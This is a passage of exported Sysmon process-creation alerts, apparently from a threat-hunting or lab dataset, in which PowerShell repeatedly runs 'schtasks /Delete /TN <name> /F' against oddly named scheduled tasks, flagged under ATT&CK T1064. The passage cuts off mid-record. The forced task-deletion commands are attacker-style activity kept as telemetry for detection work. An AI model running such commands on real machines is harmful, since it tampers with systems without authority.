C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.345"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-001002613100}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.600",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.246 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010e15e3100} +ProcessId: 4032 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.270669300Z"",""eventRecordID"":""3972"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.246\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010e15e3100}\r\nProcessId: 4032\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.246"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010e15e3100}"",""processId"":""4032"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.563",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.139 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ca5c3100} +ProcessId: 7356 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.161304200Z"",""eventRecordID"":""3971"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.139\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ca5c3100}\r\nProcessId: 7356\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.139"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010ca5c3100}"",""processId"":""7356"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.544",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.100 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ed5a3100} +ProcessId: 7816 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.106341400Z"",""eventRecordID"":""3970"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.100\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ed5a3100}\r\nProcessId: 7816\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.100"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010ed5a3100}"",""processId"":""7816"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.529",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.063 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-00103d593100} +ProcessId: 300 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.067393200Z"",""eventRecordID"":""3969"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.063\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-00103d593100}\r\nProcessId: 300\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.063"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-00103d593100}"",""processId"":""300"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.514",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.013 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-001055573100} +ProcessId: 2992 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.015479200Z"",""eventRecordID"":""3968"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.013\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-001055573100}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.013"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-001055573100}"",""processId"":""2992"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.497",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.874 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f3543100} +ProcessId: 5016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.895373300Z"",""eventRecordID"":""3967"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.874\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f3543100}\r\nProcessId: 5016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.874"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010f3543100}"",""processId"":""5016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 